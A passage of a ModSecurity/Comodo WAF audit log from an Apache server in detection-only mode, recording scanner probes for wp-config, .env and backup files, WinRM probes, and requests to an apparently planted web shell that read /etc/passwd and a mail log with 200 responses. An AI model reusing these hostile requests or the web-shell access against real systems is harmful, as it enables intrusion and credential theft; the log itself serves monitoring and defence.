"/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/wp-config.old"] [unique_id "aE3qcfCFSLfJixou_W0lVQAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/wp-config.old"] [unique_id "aE3qcfCFSLfJixou_W0lVQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936753391895 1470322 (- - -) Stopwatch2: 1749936753391895 1470322; combined=2409, p1=502, p2=1768, p3=0, p4=0, p5=139, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4bc99b14-Z-- --a4d74d3e-A-- [15/Jun/2025:03:02:55.118864 +0530] aE3qhSQOy0yoNZQ7dslOPgAAAAk 185.177.72.108 60838 127.0.0.1 7081 --a4d74d3e-B-- GET /application.properties.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4d74d3e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --a4d74d3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/application.properties.bak"] [unique_id "aE3qhSQOy0yoNZQ7dslOPgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936773624708 1494240 (- - -) Stopwatch2: 1749936773624708 1494240; combined=2131, p1=328, p2=1696, p3=0, p4=0, p5=107, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4d74d3e-Z-- --20ab5147-A-- [15/Jun/2025:03:06:26.713583 +0530] aE3rWRkoa9Lad8nP7KNzVQAAABA 121.223.165.98 46808 127.0.0.1 7081 --20ab5147-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 121.223.165.98 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 user-agent: Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.6542.1471 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=b7e71a19b2a0413bedf8f11770b3dc9f1749936978; _fbp=fb.1.1749936985415.379671977374445214 --20ab5147-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=ag4h23n26gqeh881rovolundtu; expires=Fri, 12 Sep 2025 21:36:26 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --20ab5147-E-- --20ab5147-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE3rWRkoa9Lad8nP7KNzVQAAABA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE3rWRkoa9Lad8nP7KNzVQAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936985670907 1042782 (- - -) Stopwatch2: 1749936985670907 1042782; combined=2760, p1=438, p2=2071, p3=106, p4=32, p5=112, sr=95, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20ab5147-Z-- --52e06a70-A-- [15/Jun/2025:03:15:40.988984 +0530] aE3thPBViRrxRfhQ2snSwAAAAAE 52.164.122.222 40628 127.0.0.1 7081 --52e06a70-B-- GET /hitech-news.com HTTP/1.0 Host: arrayz.com X-Real-IP: 52.164.122.222 X-Accel-Internal: /internal-nginx-static-location Connection: close --52e06a70-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --52e06a70-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||arrayz.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||arrayz.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "arrayz.com"] [uri "/hitech-news.com"] [unique_id "aE3thPBViRrxRfhQ2snSwAAAAAE"] Stopwatch: 1749937540986058 2980 (- - -) Stopwatch2: 1749937540986058 2980; combined=1655, p1=299, p2=1272, p3=0, p4=0, p5=84, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52e06a70-Z-- --33384947-A-- [15/Jun/2025:03:17:25.789382 +0530] aE3t7fCFSLfJixou_W0m7wAAAAY 52.164.122.222 48468 127.0.0.1 7081 --33384947-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: arrayz.com X-Real-IP: 52.164.122.222 X-Accel-Internal: /internal-nginx-static-location Connection: close --33384947-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --33384947-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arrayz.com"] [uri "/wp-includes/css/wp-config.php"] [unique_id "aE3t7fCFSLfJixou_W0m7wAAAAY"] Stopwatch: 1749937645786379 3056 (- - -) Stopwatch2: 1749937645786379 3056; combined=1776, p1=391, p2=1330, p3=0, p4=0, p5=55, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33384947-Z-- --6851bc75-A-- [15/Jun/2025:03:18:17.699525 +0530] aE3uIZ4hb3-ZG-auIyDQhAAAAAg 52.164.122.222 52622 127.0.0.1 7081 --6851bc75-B-- GET /wp-config.php HTTP/1.0 Host: arrayz.com X-Real-IP: 52.164.122.222 X-Accel-Internal: /internal-nginx-static-location Connection: close --6851bc75-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Connection: close Content-Type: text/html; charset=UTF-8 --6851bc75-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arrayz.com"] [uri "/wp-config.php"] [unique_id "aE3uIZ4hb3-ZG-auIyDQhAAAAAg"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/arrayz.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749937697696059 3508 (- - -) Stopwatch2: 1749937697696059 3508; combined=1900, p1=392, p2=1391, p3=31, p4=30, p5=56, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6851bc75-Z-- --c0539626-A-- [15/Jun/2025:03:25:54.684717 +0530] aE3v6NAcUP5X8o425y3aBQAAAAQ 83.217.210.41 52710 127.0.0.1 7081 --c0539626-B-- GET //.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://gulachi.com//.env accept-encoding: gzip --c0539626-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Pragma: no-cache Expires: Sat, 14 Jun 2025 22:55:54 GMT Cache-Control: max-age=3600 X-Redirect-By: WordPress Set-Cookie: PHPSESSID=bf1nvnt352rirkj6oho1stbiu1; path=/ Set-Cookie: _sfs_id=a69ab22de3f23e7851a5f0d3c0e5af7e1749938153; expires=Sat, 14 Jun 2025 22:55:53 GMT; Max-Age=3600; path=/; secure; HttpOnly Location: https://www.gulachi.com/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c0539626-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aE3v6NAcUP5X8o425y3aBQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749938152901640 1783169 (- - -) Stopwatch2: 1749938152901640 1783169; combined=1710, p1=380, p2=1236, p3=0, p4=0, p5=94, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0539626-Z-- --f657151c-A-- [15/Jun/2025:03:25:56.812505 +0530] aE3v6xkoa9Lad8nP7KN1ZwAAABA 83.217.210.41 52756 127.0.0.1 7081 --f657151c-B-- GET /.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: https://www.gulachi.com//.env user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --f657151c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=bh8no21p7dqeh0jimbcgc3uqp2; path=/ Set-Cookie: _sfs_id=678377c57c6087f409479d57129c2a581749938156; expires=Sat, 14 Jun 2025 22:55:56 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --f657151c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env"] [unique_id "aE3v6xkoa9Lad8nP7KN1ZwAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749938155049756 1762826 (- - -) Stopwatch2: 1749938155049756 1762826; combined=1991, p1=442, p2=1429, p3=0, p4=0, p5=120, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f657151c-Z-- --69f8924b-A-- [15/Jun/2025:03:32:04.407106 +0530] aE3xXBkoa9Lad8nP7KN12wAAABA 3.89.176.255 34120 127.0.0.1 7081 --69f8924b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/passwd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.89.176.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --69f8924b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4962 Connection: close Content-Type: text/html; charset=UTF-8 --69f8924b-H-- Message: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3xXBkoa9Lad8nP7KN12wAAABA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749938524401820 5355 (- - -) Stopwatch2: 1749938524401820 5355; combined=2760, p1=457, p2=2162, p3=43, p4=32, p5=66, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69f8924b-Z-- --45fcaa47-A-- [15/Jun/2025:03:32:35.375323 +0530] aE3xeeXds7bzDL-AINRcTAAAAAM 52.169.15.141 40616 127.0.0.1 7081 --45fcaa47-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.home9ine.com X-Real-IP: 52.169.15.141 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=26f64f72571751c0403532d200e6af5f1749938474; wordpress_test_cookie=WP%20Cookie%20check --45fcaa47-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Connection: close Content-Type: text/html; charset=UTF-8 --45fcaa47-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.home9ine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.home9ine.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE3xeeXds7bzDL-AINRcTAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/home9ine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749938553839201 1536187 (- - -) Stopwatch2: 1749938553839201 1536187; combined=2052, p1=338, p2=1617, p3=0, p4=0, p5=96, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45fcaa47-Z-- --d40d576d-A-- [15/Jun/2025:03:34:19.656143 +0530] aE3x49AcUP5X8o425y3aqgAAAAQ 34.225.138.57 60420 127.0.0.1 7081 --d40d576d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/mail.err.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.225.138.57 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --d40d576d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2945 Connection: close Content-Type: text/html; charset=UTF-8 --d40d576d-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3x49AcUP5X8o425y3aqgAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749938659651818 4387 (- - -) Stopwatch2: 1749938659651818 4387; combined=2350, p1=399, p2=1807, p3=42, p4=36, p5=66, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d40d576d-Z-- --e4b99433-A-- [15/Jun/2025:03:35:00.139630 +0530] aE3yC9C7wXmuvKRT4TojCAAAAA8 52.169.30.24 53738 127.0.0.1 7081 --e4b99433-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 52.169.30.24 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --e4b99433-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --e4b99433-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.3econcepts.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE3yC9C7wXmuvKRT4TojCAAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749938699512683 627010 (- - -) Stopwatch2: 1749938699512683 627010; combined=1875, p1=303, p2=1469, p3=0, p4=0, p5=103, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4b99433-Z-- --e0315e4f-A-- [15/Jun/2025:03:37:07.817931 +0530] aE3yi_CFSLfJixou_W0oqwAAAAY 101.251.238.174 47594 127.0.0.1 7080 --e0315e4f-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.174 Connection: close Content-Length: 0 Authorization: Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw== Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client --e0315e4f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0315e4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE3yi_CFSLfJixou_W0oqwAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE3yi_CFSLfJixou_W0oqwAAAAY"] Stopwatch: 1749938827814506 3496 (- - -) Stopwatch2: 1749938827814506 3496; combined=2153, p1=436, p2=1566, p3=22, p4=23, p5=106, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0315e4f-Z-- --6dc46359-A-- [15/Jun/2025:03:37:11.046267 +0530] aE3yj_CFSLfJixou_W0orQAAAAY 101.251.238.174 44008 127.0.0.1 7080 --6dc46359-B-- POST /wsman HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 101.251.238.174 Connection: close Content-Length: 198 Content-Type: application/soap+xml;charset=UTF-8 User-Agent: Microsoft WinRM Client WSMANIDENTIFY: unauthenticated --6dc46359-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dc46359-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 